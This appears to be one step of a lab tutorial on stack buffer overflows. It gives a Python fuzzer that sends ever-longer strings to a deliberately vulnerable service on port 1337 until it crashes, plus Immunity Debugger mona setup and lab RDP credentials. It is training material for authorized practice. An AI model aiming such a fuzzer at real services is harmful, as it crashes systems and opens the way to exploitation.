# 2. Fuzzing

### Fuzzing

xfreerdp /u:admin /p:password /cert:ignore /v:10.10.213.94

Once we find a vulnerable part with **Spiking**, we are going to use **fuzzing**. **Fuzzing** is to send a bunch of characters to the program to see if we can break it.

On your **Kali box**, connect to port 1337 on MACHINE\_IP using netcat:

```
nc MACHINE_IP 1337
```

**Mona Configuration**

The mona script has been preinstalled, however to make it easier to work with, you should configure a working folder using the following command, which you can run **in the command input box at the bottom of the Immunity Debugger window:**

```
!mona config -set workingfolder c:\mona\%p
```

### fuzzer.py

```
import socket, time, sys

ip = "MACHINE_IP"
port = 1337
timeout = 5

buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        connect = s.connect((ip, port))
        s.recv(1024)
        print("Fuzzing with %s bytes" % len(string))
        s.send("OVERFLOW1 " + string + "\r\n")
        s.recv(1024)
        s.close()
    except:
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)
```

Run the fuzzer . py script using python: `python fuzzer.py`

The fuzzer will send increasingly long strings comprised of As (up to 3000). If the fuzzer crashes the server with one of the strings, you should see an error like: "Could not connect to MACHINE\_IP:1337". **Make a note of the largest number of bytes that were sent.**